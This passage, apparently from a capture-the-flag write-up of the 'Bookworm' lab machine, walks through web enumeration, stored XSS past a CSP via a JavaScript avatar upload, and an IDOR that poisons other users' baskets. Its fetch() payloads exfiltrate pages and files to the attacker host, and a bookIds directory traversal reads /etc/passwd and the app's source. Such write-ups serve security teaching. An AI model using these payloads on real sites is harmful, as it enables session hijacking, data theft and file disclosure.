301 GET 10l 16w 187c http://bookworm.htb/static/img => http://bookworm.htb/static/img/
301 GET 10l 16w 203c http://bookworm.htb/static/img/uploads => http://bookworm.htb/static/img/uploads/
200 GET 239l 675w 10772c http://bookworm.htb/Shop
302 GET 1l 4w 28c http://bookworm.htb/Profile => http://bookworm.htb/login
301 GET 10l 16w 199c http://bookworm.htb/static/img/books => http://bookworm.htb/static/img/books/
200 GET 1979l 12005w 876363c http://bookworm.htb/static/img/uploads/1
200 GET 2070l 11925w 839521c http://bookworm.htb/static/img/uploads/5
200 GET 2035l 11769w 850715c http://bookworm.htb/static/img/uploads/3
200 GET 82l 197w 3093c http://bookworm.htb/Register
200 GET 2352l 13106w 923635c http://bookworm.htb/static/img/uploads/2
302 GET 1l 4w 28c http://bookworm.htb/Basket => http://bookworm.htb/login
200 GET 2216l 12734w 886261c http://bookworm.htb/static/img/uploads/4
200 GET 2000l 12205w 882180c http://bookworm.htb/static/img/uploads/6
301 GET 10l 16w 179c http://bookworm.htb/Static => http://bookworm.htb/Static/
302 GET 1l 4w 23c http://bookworm.htb/Logout => http://bookworm.htb/
301 GET 10l 16w 185c http://bookworm.htb/Static/js => http://bookworm.htb/Static/js/
301 GET 10l 16w 187c http://bookworm.htb/Static/img => http://bookworm.htb/Static/img/
301 GET 10l 16w 187c http://bookworm.htb/Static/css => http://bookworm.htb/Static/css/
301 GET 10l 16w 203c http://bookworm.htb/Static/img/uploads => http://bookworm.htb/Static/img/uploads/
301 GET 10l 16w 199c http://bookworm.htb/Static/img/books => http://bookworm.htb/Static/img/books/
200 GET 1979l 12005w 876363c http://bookworm.htb/Static/img/uploads/1
200 GET 2035l 11769w 850715c http://bookworm.htb/Static/img/uploads/3
200 GET 2070l 11925w 839521c http://bookworm.htb/Static/img/uploads/5
200 GET 2352l 13106w 923635c http://bookworm.htb/Static/img/uploads/2
200 GET 0l 0w 496122c http://bookworm.htb/Static/img/uploads/4
200 GET 2000l 12205w 882180c http://bookworm.htb/Static/img/uploads/6
200 GET 62l 140w 2034c http://bookworm.htb/LOGIN
301 GET 10l 16w 179c http://bookworm.htb/STATIC => http://bookworm.htb/STATIC/
301 GET 10l 16w 185c http://bookworm.htb/STATIC/js => http://bookworm.htb/STATIC/js/
301 GET 10l 16w 187c http://bookworm.htb/STATIC/img => http://bookworm.htb/STATIC/img/
301 GET 10l 16w 187c http://bookworm.htb/STATIC/css => http://bookworm.htb/STATIC/css/
301 GET 10l 16w 203c http://bookworm.htb/STATIC/img/uploads => http://bookworm.htb/STATIC/img/uploads/
500 GET 7l 14w 186c http://bookworm.htb/ecology
500 GET 7l 14w 186c http://bookworm.htb/STATIC/img/werbung
500 GET 7l 14w 186c http://bookworm.htb/STATIC/js/exports
500 GET 7l 14w 186c http://bookworm.htb/Static/css/530
500 GET 7l 14w 186c http://bookworm.htb/static/img/uploads/lettings
200 GET 1979l 12005w 876363c http://bookworm.htb/STATIC/img/uploads/1
200 GET 2070l 11925w 839521c http://bookworm.htb/STATIC/img/uploads/5
200 GET 2035l 11769w 850715c http://bookworm.htb/STATIC/img/uploads/3
200 GET 2352l 13106w 923635c http://bookworm.htb/STATIC/img/uploads/2
500 GET 7l 14w 186c http://bookworm.htb/kmail
500 GET 7l 14w 186c http://bookworm.htb/static/js/zWorkingFiles
500 GET 7l 14w 186c http://bookworm.htb/Static/js/bluechat
500 GET 7l 14w 186c http://bookworm.htb/Static/js/board_old
500 GET 7l 14w 186c http://bookworm.htb/static/img/books/purpose
500 GET 7l 14w 186c http://bookworm.htb/landing-page-4
500 GET 7l 14w 186c http://bookworm.htb/static/css/yell
500 GET 7l 14w 186c http://bookworm.htb/static/img/search-form-js
500 GET 7l 14w 186c http://bookworm.htb/static/css/zapchasti
200 GET 2000l 12205w 882180c http://bookworm.htb/STATIC/img/uploads/6
[####################] - 8m 540000/540000 0s found:62 errors:76839
[####################] - 5m 30000/30000 96/s http://bookworm.htb/
[####################] - 6m 30000/30000 76/s http://bookworm.htb/static/
[####################] - 6m 30000/30000 75/s http://bookworm.htb/static/js/
[####################] - 6m 30000/30000 75/s http://bookworm.htb/static/css/
[####################] - 6m 30000/30000 76/s http://bookworm.htb/static/img/
[####################] - 6m 30000/30000 74/s http://bookworm.htb/static/img/uploads/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/static/img/books/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/Static/
[####################] - 6m 30000/30000 72/s http://bookworm.htb/Static/js/
[####################] - 6m 30000/30000 72/s http://bookworm.htb/Static/img/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/Static/css/
[####################] - 6m 30000/30000 72/s http://bookworm.htb/Static/img/uploads/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/Static/img/books/
[####################] - 4m 30000/30000 106/s http://bookworm.htb/STATIC/
[####################] - 4m 30000/30000 107/s http://bookworm.htb/STATIC/js/
[####################] - 4m 30000/30000 107/s http://bookworm.htb/STATIC/img/
[####################] - 4m 30000/30000 107/s http://bookworm.htb/STATIC/css/
[####################] - 4m 30000/30000 108/s http://bookworm.htb/STATIC/img/uploads/
One take-away is that the server doesn’t seem to be case-sensitive, which is not common on Linux webservers. The /static/img/uploads
directory seems interesting. It seems to be where profile pictures are stored, like these:
When I change my avatar, it is stored at /static/img/uploads/14
. Nothing else too interesting.
The note that comes with my order is the one place on the website where I can put in text and it is displayed back, so I’ll want to check that for cross-site scripting (XSS). I’ll try a simple <script>alert(1)</script>
payload. When I view the order, the note looks empty:
Interestingly, in the page source, the full tag is there:
So why was there no pop up? The console shows the answer:
There is a content security policy (CSP) specified in the response headers for the page:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 14 Jan 2024 19:19:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: Express
Content-Security-Policy: script-src 'self'
ETag: W/"889-a2rRyHrrtWJh7mMEDW/b7erywnQ"
Set-Cookie: session=eyJmbGFzaE1lc3NhZ2UiOnt9LCJ1c2VyIjp7ImlkIjoxNCwibmFtZSI6IjB4ZGYiLCJhdmF0YXIiOiIvc3RhdGljL2ltZy91cGxvYWRzLzE0In19; path=/; httponly
Set-Cookie: session.sig=-Bo5hHK-aeYn-cDoCzzTzICGdrg; path=/; httponly
Content-Length: 2185
The self
directive specifies that the same origin is a valid source for scripts, and since there’s nothing else listed, nothing else will run. If I want to run a script, I need it to come from Bookworm.
The one place I found that I can upload files is the avatar. I’ll see what happens when I try to upload a JavaScript file. I’ll upload an image and get the request in Burp, sending it to Repeater. It’s a POST request to /profile/avatar
.
If I change the Content-Type
to anything that’s not image/png
or image/jpeg
, the response has the same redirect, but the cookie is set:
That cookie has a “flash message”:
However, if I don’t change the Content-Type
, I can put whatever I want in the payload:
No cookie update means success. On my profile there’s a broken image:
If I create a message on an order to include the path to that image as the script source, like <script src="/static/img/uploads/14"></script>
, then when I view that order:
At this point, I have XSS in my orders page, but it doesn’t seem like anyone is checking it. I’ll include some JavaScript that will connect back to my host, using a simple fetch
payload:
I’m showing the JavaScript Fetch API here where in the past I’ve often shown XMLHttpRequest
. Either could work, but fetch
is pretty clean.
When I refresh the same order, it loads the new JavaScript and makes an attempt at my server:
10.10.14.6 - - [15/Jan/2024 11:30:55] code 404, message File not found
10.10.14.6 - - [15/Jan/2024 11:30:55] "GET /xss HTTP/1.1" 404 -
Unfortunately, there are no connections back to me from any other users. It makes sense that no one else is looking at my orders. I’ll need to find a way to get XSS in front of another user.
I’ll need to find a page that other users are checking if XSS is going to get anywhere. I’ll notice when I update my basket note that the POST looks like:
POST /basket/386/edit HTTP/1.1
Host: bookworm.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://bookworm.htb
Connection: close
Referer: http://bookworm.htb/basket
Cookie: session=eyJmbGFzaE1lc3NhZ2UiOnt9LCJ1c2VyIjp7ImlkIjoxNCwibmFtZSI6IjB4ZGYiLCJhdmF0YXIiOiIvc3RhdGljL2ltZy91c2VyLnBuZyJ9fQ==; session.sig=oXoXrRyKLk0xwu6KhLkPo6XC6hw
Upgrade-Insecure-Requests: 1
quantity=1&note=This+is+a+new+note
The 386 in the url must be the ID of the basket being updated. When I visit the /shop
page, I’ll notice that my activity is displayed:
Interestingly, that block of HTML has a comment above it:
If I visit when there’s another user there, their basket ID is in a comment as well:
Given that the basket ID is specified in the POST request to edit the comment, I’ll try writing to the basket of another user and see if I can edit it. I’ll choose a user who just added something to their cart, as they are most likely to be checking it.
I’ll grab an ID from the HTML in recent activity, and add that to a POST request in Repeater:
On sending, it returns a redirect to /basket
(just like when I do it legitimately), and the Cookie has a flash message showing success:
A few minutes later, there’s a request at my Python webserver:
10.10.11.215 - - [15/Jan/2024 14:23:40] code 404, message File not found
10.10.11.215 - - [15/Jan/2024 14:23:40] "GET /xss HTTP/1.1" 404 -
This is a classic insecure direct object reference (IDOR) vulnerability, as I’m able to access something I shouldn’t be able to just by changing the ID.
I’m going to need to update my XSS payload and then poison baskets again to figure out where to go next. I’ll write a quick Python script to make the necessary requests:
#!/usr/bin/env python3
import re
import requests

username = "0xdf"
password = "0xdf0xdf"
my_avatar_id = 14
base_url = "http://bookworm.htb"
xss = """fetch('http://10.10.14.6/python');"""

sess = requests.session()
# login
sess.post(f'{base_url}/login', data={"username": username, "password": password})
# set XSS in avatar
sess.post(f'{base_url}/profile/avatar', files={'avatar': ('htb.js', xss, 'image/png')})
# get basket id and IDOR
resp = sess.get(f'{base_url}/shop')
ids = re.findall(r'<!-- (\d+) -->', resp.text)
for bid in ids:
    resp = sess.post(f'{base_url}/basket/{bid}/edit', data={"quantity": "1", "note": f'<script src="/static/img/uploads/{my_avatar_id}"></script>'}, allow_redirects=False)
    if resp.status_code == 302:
        print(f"Poisoned basket {bid}")
This assumes that the user 0xdf already exists with the password 0xdf0xdf, with an avatar ID of 14 (all configured at the top). It updates the avatar with the JavaScript defined towards the top, and then gets all the basket ids from /shop
and poisons them.
I’m going to have to build a bunch of XSS payloads to get through the next step. To test, there are a few techniques I found very helpful.
First, I’ll have an order on my profile page poisoned to load JavaScript from my avatar. This allows me to upload new JS, and then refresh my profile and look for errors in the developer tools console.
It’s also very useful to test JavaScript directly in the dev console before trying to put it into XSS payloads. It shows errors and line numbers, catching simple syntax errors.
I noted above that the cookies on the site are marked HttpOnly, so exfiltrating those won’t work. I don’t know of any other sites that might exist, but I could try to enumerate other ports on localhost. Before doing that, I’ll take a look at what these users can see on bookworm.htb
. I’ll set the xss
variable in my script to the following to take a look at the user’s profile:
fetch('/profile', {credentials: "include"})
  .then((resp) => resp.text())
  .then((resptext) => {
    fetch("http://10.10.14.6/exfil", {
      method: "POST",
      mode: "no-cors",
      body: resptext
    });
  });
I’ll listen with nc
on port 80, and after a couple minutes, what returns is the same as what I see on mine, with different data / orders. The order numbers for the user are very low:
<tbody>
<tr>
<th scope="row">Order #7</th>
<td>Fri Dec 23 2022 20:10:04 GMT+0000 (Coordinated Universal Time)</td>
<td>£34</td>
<td>
<a href="/order/7">View Order</a>
</td>
</tr>
<tr>
<th scope="row">Order #8</th>
<td>Sun Dec 25 2022 20:10:04 GMT+0000 (Coordinated Universal Time)</td>
<td>£80</td>
<td>
<a href="/order/8">View Order</a>
</td>
</tr>
<tr>
<th scope="row">Order #9</th>
<td>Wed Dec 28 2022 20:10:04 GMT+0000 (Coordinated Universal Time)</td>
<td>£34</td>
<td>
<a href="/order/9">View Order</a>
</td>
</tr>
<tr>
<th scope="row">Order #407</th>
<td>Tue Jan 16 2024 17:56:24 GMT+0000 (Coordinated Universal Time)</td>
<td>£40</td>
<td>
<a href="/order/407">View Order</a>
</td>
</tr>
</tbody>
</table>
There’s a note on the /basket
page about being able to download earlier orders as e-books:
To see what that looks like, I’ll check out these orders, updating my script first to:
fetch('/profile', {credentials: "include"})
  .then((resp) => resp.text())
  .then((resptext) => {
    var regex = /\/order\/\d+/g;
    while ((match = regex.exec(resptext)) !== null) {
      fetch("http://10.10.14.6" + match);
    };
  });
I’ll run nc -klnvp 80
so that it stays open and handles multiple requests on 80. When this executes, I get the IDs from the target profile:
oxdf@hacky$ nc -lnkvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.215 44720
GET /order/16 HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
Connection received on 10.10.11.215 44722
GET /order/17 HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
Connection received on 10.10.11.215 44730
GET /order/18 HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
I’ll update this to return the order pages:
fetch('/profile', {credentials: "include"})
  .then((resp) => resp.text())
  .then((resptext) => {
    var regex = /\/order\/\d+/g;
    while ((match = regex.exec(resptext)) !== null) {
      fetch(match, {credentials: "include"})
        .then((resp2) => resp2.text())
        .then((resptext2) => {
          fetch("http://10.10.14.6/exfil" + match, {
            method: "POST",
            mode: "no-cors",
            body: resptext2
          });
        });
    };
  });
This should get each order page in the profile, fetch it, and return it to me via POST request.
After a few minutes (and a few attempts running the script), I get a connection, which gives a few pages. For example, one might look like the following page:
The CSS doesn’t load, but that’s ok. The interesting part is the “Download e-book” link, which points to /download/7?bookIds=9
. Some orders have more than one book, and look like this:
The important difference here is the “Download everything link”, which leads to /download/2?bookIds=18&bookIds=11
. It seems that the bookIds
parameter can be a single string or (when multiple are specified) an array (I go over why this works in Beyond Root).
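Express’s query parsing isn’t shown here, but Python’s standard library illustrates the repeated-parameter behavior (with the difference that parse_qs always returns lists, where Express’s default parser gives a bare string for a single occurrence):

```python
from urllib.parse import parse_qs

# One occurrence vs. repeated occurrences of the same parameter
print(parse_qs("bookIds=9"))              # {'bookIds': ['9']}
print(parse_qs("bookIds=18&bookIds=11"))  # {'bookIds': ['18', '11']}
```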
I’ll try to download a file by updating my script to find the link again to get a single download link and return what it returns. I’ve updated the response to be resp3.blob()
rather than .text()
because I expect an e-book to be a binary format:
fetch('/profile', {credentials: "include"})
  .then((resp) => resp.text())
  .then((resptext) => {
    var match = resptext.match(/\/order\/\d+/);
    fetch(match, {credentials: "include"})
      .then((resp2) => resp2.text())
      .then((resptext2) => {
        var match2 = resptext2.match(/\/download\/\d+\?bookIds=\d+/);
        fetch(match2, {credentials: "include"})
          .then((resp3) => resp3.blob())
          .then((data) => {
            fetch("http://10.10.14.6/exfil", {
              method: "POST",
              mode: "no-cors",
              body: data
            });
          });
      });
  });
This one returns a PDF:
oxdf@hacky$ nc -lnvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.215 33964
POST /exfil HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
Content-Length: 1006
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
%PDF-1.3
3 0 obj
<</Type /Page
/Parent 1 0 R
/Resources 2 0 R
/Contents 4 0 R>>
endobj
4 0 obj
<</Filter /FlateDecode /Length 115>>
stream
x=̱
@E~uj8-zZ D6_^8505O
@*b8ۚj!*,aێ73ڴx~2nSN^{N;gE#q=ӉQ}Q
endstream
endobj
1 0 obj
<</Type /Pages
/Kids [3 0 R ]
/Count 1
/MediaBox [0 0 595.28 841.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 5 0 R
>>
/XObject <<
>>
>>
endobj
6 0 obj
<<
/Producer (PyFPDF 1.7.2 http://pyfpdf.googlecode.com/)
/CreationDate (D:20230129212444)
>>
endobj
7 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/OpenAction [3 0 R /FitH null]
/PageLayout /OneColumn
>>
endobj
xref
0 8
0000000000 65535 f
0000000272 00000 n
0000000455 00000 n
0000000009 00000 n
0000000087 00000 n
0000000359 00000 n
0000000559 00000 n
0000000668 00000 n
trailer
<<
/Size 8
/Root 7 0 R
/Info 6 0 R
>>
startxref
771
%%EOF
I’m curious to see what comes back when I try to download multiple books at the same time. It seems unlikely that it would be a single PDF, and more likely some kind of archive.
I wasted a ton of time trying to write JavaScript that would check each order page for a “Download everything” link and visit it. I’m sure it’s possible, but the JS was getting complex and very difficult to troubleshoot blindly, with 4-5 minute waits between attempts.
Eventually I decided to try seeing how tied to the current user the download is. The order ID in the URL must match the current user, or nothing comes back. But it doesn’t seem that the books are checked to see if they are in the current order. That means I can just grab an order ID from the profile and then download any books I want:
fetch('/profile', {credentials: 'include'})
  .then((resp) => resp.text())
  .then((resptext) => {
    order_id = resptext.match(/\/order\/(\d+)/);
    fetch("http://bookworm.htb/download/"+order_id[1]+"?bookIds=1&bookIds=2", {credentials: 'include'})
      .then((resp2) => resp2.blob())
      .then((data) => {
        fetch("http://10.10.14.6/exfil", {
          method: "POST",
          mode: 'no-cors',
          body: data
        });
      });
  });
What comes back is a ZIP archive:
oxdf@hacky$ nc -lnvkp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.215 47762
POST /exfil HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
Content-Length: 1629
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
p>V$Alice's Adventures in Wonderland.pdfmRkAै'RhnɦmIA2L3qwVfE E< Vz)V=yDL~Ѹ{7Kj( /UQ"u
8Glpx PA<yZHq&(>DdL"E]6q.4M-^)*L"_xPg5u*aנx<1~z7vV-]g+i?{4v??>oz?
æ>~GmsEt/ə@xT-* JAE8,^v ~ؿp;<vnQU6.GSaY")HWB
_`]%>,E#K=$*8k˖Hp:䚦RCB'07+r%dsnCQS%,MhaEE">XXg'SDr-m2[lڒY`;wIpwix0r@T:Ti1
Fc2v hhx85P?up>VThrough the Looking-Glass.pdfmRn@`$Tu]P)-"gUMj5Pp$XtX6;~>WaMm x39.U뺚Չ
=R*ѭ~nnL
8:40mT8De̗,Ya$0jE*zG
$1{;hu>Wkt/̝_8||yA晸QxK,sSP?svg\yQN:,8@BO)qEhBokM0fV+@PbZaKkq]so@70z"\B/#P ]gC*K 0/MsԮZ@':nk2>k-B
z+2MtEՊ4%?0ݷg5Bily
LawzsB,֨wf3()^m@('LS7
(Y0n3}\N?V#|P \4!dB
bx|.GPWG|Pp>V?u$ Alice's Adventures in Wonderland.pdfPp>VWG| Through the Looking-Glass.pdfPK
It looks a bit weird here because some of the binary bytes mess up the terminal display of the ASCII ones, but collecting it again and saving it to a file shows that it’s a valid archive, as I’ll show in the next section.
If I’m going to be trying to collect files, it seems time to make a better webserver than just catching them with nc.
from pathlib import Path
from flask import Flask, request

app = Flask(__name__)

@app.route('/exfil', methods=["POST"])
def exfil():
    print("Got a file")
    data = request.get_data()
    output = Path('exfil/exfil.zip')
    output.write_bytes(data)
    return ""

if __name__ == "__main__":
    app.run(debug=True, host="0.0.0.0", port=80)
This is a simple Python Flask server that saves anything POSTed to /exfil into the exfil directory as exfil.zip.
Now I can run the same fetch for the two PDFs above and get a ZIP:
oxdf@hacky$ file exfil/exfil.zip
exfil/exfil.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
oxdf@hacky$ unzip -l exfil/exfil.zip
Archive: exfil/exfil.zip
Length Date Time Name
--------- ---------- ----- ----
1006 2023-01-30 19:51 Alice's Adventures in Wonderland.pdf
1001 2023-01-30 19:51 Through the Looking-Glass.pdf
--------- -------
2007 2 files
Thinking about how the server works, these e-books are likely stored on the file system. It’s worth looking at the download requests to see if I can read other files off it.
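If the server builds paths by joining a base directory with the request’s bookIds, nothing stops ../ components from walking out of that directory. A minimal Python sketch of the failure mode (the books directory path is hypothetical):

```python
import os.path

books_dir = "/app/books"  # hypothetical location of the books directory on the server

# A normal book ID stays inside the directory...
print(os.path.normpath(os.path.join(books_dir, "1")))
# /app/books/1

# ...but "../" components walk right out of it.
print(os.path.normpath(os.path.join(books_dir, "../../../../etc/passwd")))
# /etc/passwd
```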
Trying the traversal in the single-file download doesn’t seem to work; I just get nothing back (I’ll look at why in Beyond Root). I’ll try this payload for a directory traversal in the multi-file download:
fetch('/profile', {credentials: 'include'})
  .then((resp) => resp.text())
  .then((resptext) => {
    order_id = resptext.match(/\/order\/(\d+)/);
    fetch("http://bookworm.htb/download/"+order_id[1]+"?bookIds=1&bookIds=../../../../etc/passwd", {credentials: 'include'})
      .then((resp2) => resp2.blob())
      .then((data) => {
        fetch("http://10.10.14.6/exfil", {
          method: "POST",
          mode: 'no-cors',
          body: data
        });
      });
  });
When it returns, there’s an Unknown.pdf in the zip:
oxdf@hacky$ unzip -l exfil/exfil.zip
Archive: exfil/exfil.zip
Length Date Time Name
--------- ---------- ----- ----
1006 2023-01-30 19:51 Alice's Adventures in Wonderland.pdf
2087 2023-06-05 20:53 Unknown.pdf
--------- -------
3093 2 files
It’s not a PDF, but /etc/passwd:
oxdf@hacky$ cat exfil/Unknown.pdf
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
frank:x:1001:1001:,,,:/home/frank:/bin/bash
neil:x:1002:1002:,,,:/home/neil:/bin/bash
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
fwupd-refresh:x:114:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:997:997::/var/log/laurel:/bin/false
james:x:1000:1000:,,,:/home/james:/bin/bash
In addition to proving that the directory traversal works, I’ll also note the usernames frank, neil, and james.
I’ll try to pull the source code for this application. I know it’s Express, so the main logic is likely in an index.js. It’s not in the current directory, but the XSS payload returns the source when updated with:
fetch("http://bookworm.htb/download/"+order_id[1]+"?bookIds=1&bookIds=../index.js", {credentials: 'include'})
The main source is:
const express = require("express");
const nunjucks = require("nunjucks");
const path = require("path");
const session = require("cookie-session");
const fileUpload = require("express-fileupload");
const archiver = require("archiver");
const fs = require("fs");
const { flash } = require("express-flash-message");
const { sequelize, User, Book, BasketEntry, Order, OrderLine } = require("./database");
const { hashPassword, verifyPassword } = require("./utils");
const { QueryTypes } = require("sequelize");
const { randomBytes } = require("node:crypto");
const timeAgo = require("timeago.js");
const app = express();
const port = 3000;
const env = nunjucks.configure("templates", {
autoescape: true,
express: app,
});
env.addFilter("timeago", (val) => {
return timeAgo.format(new Date(val), "en_US");
});
app.use(express.urlencoded({ extended: false }));
app.use(
session({
secret: process.env.NODE_ENV === "production" ? randomBytes(69).toString("hex") : "secret",
resave: false,
saveUninitialized: true,
cookie: {
maxAge: 1000 * 60 * 60 * 24 * 7,
httpOnly: false,
},
})
);
app.use(flash({ sessionKeyName: "flashMessage", useCookieSession: true }));
app.use("/static", express.static(path.join(__dirname, "static")));
app.use(
fileUpload({
limits: { fileSize: 2 * 1024 * 1024 },
})
);
app.use((req, res, next) => {
res.set("Content-Security-Policy", "script-src 'self'");
next();
});
const renderWithFlashes = async (req, res, template, data = {}) => {
res.render(template, {
errors: await req.consumeFlash("error"),
successes: await req.consumeFlash("success"),
user: req.session.user,
currentUrl: req.url,
basketCount: req.session.user ? (await BasketEntry.sum("quantity", { where: { userId: req.session.user.id } })) ?? 0 : 0,
...data,
});
};
app.get("/", async (req, res) => {
await renderWithFlashes(req, res, "index.njk");
});
app.get("/login", async (req, res) => {
if (req.session.user) {
return res.redirect("/shop");
}
await renderWithFlashes(req, res, "login.njk");
});
app.post("/login", async (req, res) => {
const { username, password } = req.body;
const user = await User.findOne({
where: {
username,
},
});
if (!user) {
await req.flash("error", "Invalid username or password.");
return res.redirect("/login");
}
if (!verifyPassword(password, user.password)) {
await req.flash("error", "Invalid username or password.");
return res.redirect("/login");
}
console.log(user.username, "logged in");
req.session.user = {
id: user.id,
name: user.name,
avatar: user.avatar,
};
await req.flash("success", "You have successfully logged in. Welcome back!");
res.redirect("/shop");
});
app.get("/register", async (req, res) => {
await renderWithFlashes(req, res, "register.njk");
});
app.post("/register", async (req, res) => {
const { name, username, password, addressLine1, addressLine2, town, postcode } = req.body;
const users = await User.findAll({
where: {
username,
},
});
if (users.length !== 0) {
await req.flash("error", "A user with this username already exists!");
return res.redirect("/login");
}
if (
name.length == 0 ||
username.length == 0 ||
password.length == 0 ||
addressLine1.length == 0 ||
addressLine2.length == 0 ||
town.length == 0 ||
postcode.length == 0
) {
await req.flash("error", "Sorry, all fields are required to be filled out!!");
return res.redirect("/login");
}
if (
name.length > 20 ||
username.length > 20 ||
password.length > 20 ||
addressLine1.length > 20 ||
addressLine2.length > 20 ||
town.length > 20 ||
postcode.length > 20
) {
await req.flash("error", "Sorry, we can't accept any data longer than 20 characters!");
return res.redirect("/login");
}
await User.create({
name: name,
username: username,
password: hashPassword(password),
avatar: `/static/img/user.png`,
addressLine1,
addressLine2,
town,
postcode,
});
await req.flash("success", "Account created! Please log in.");
res.redirect("/login");
});
app.get("/logout", async (req, res) => {
req.session.user = undefined;
await req.flash("success", "You have been logged out. Please visit again soon.");
return res.redirect("/");
});
app.get("/shop", async (req, res) => {
// Not included in development version as sqlite lacks interval
const timeComponent =
process.env.NODE_ENV === "production" ? " WHERE `BasketEntries`.`createdAt` > date_sub(now(), interval 5 minute) " : "";
const recentUpdates = await sequelize.query(
"SELECT `BasketEntries`.id, `BasketEntries`.createdAt, `Books`.title, `Users`.name, `Users`.avatar, `Books`.id as bookId FROM `BasketEntries` LEFT JOIN `Books` ON `Books`.id = `BasketEntries`.bookId LEFT JOIN `Users` ON `Users`.id = `BasketEntries`.userId " +
timeComponent +
" ORDER BY `BasketEntries`.`createdAt` DESC LIMIT 5",
{ type: QueryTypes.SELECT }
);
await renderWithFlashes(req, res, "shop.njk", {
books: await Book.findAll(),
basket: req.session.user
? (await BasketEntry.findAll({ where: { userId: req.session.user.id } })).map((x) => JSON.stringify(x.toJSON()))
: [],
recentUpdates: recentUpdates,
});
});
app.get("/shop/:id", async (req, res) => {
const id = req.params.id;
const book = await Book.findOne({ where: { id } });
if (!book) {
await req.flash("error", "That book doesn't seem to exist!");
return res.redirect("/shop");
}
await renderWithFlashes(req, res, "book.njk", { book });
});
app.get("/basket", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to access your basket!");
return res.redirect("/login");
}
const entries = await BasketEntry.findAll({ where: { userId: req.session.user.id } });
const basket = [];
for (const entry of entries) {
basket.push({
...entry.toJSON(),
book: await Book.findByPk(entry.bookId),
});
}
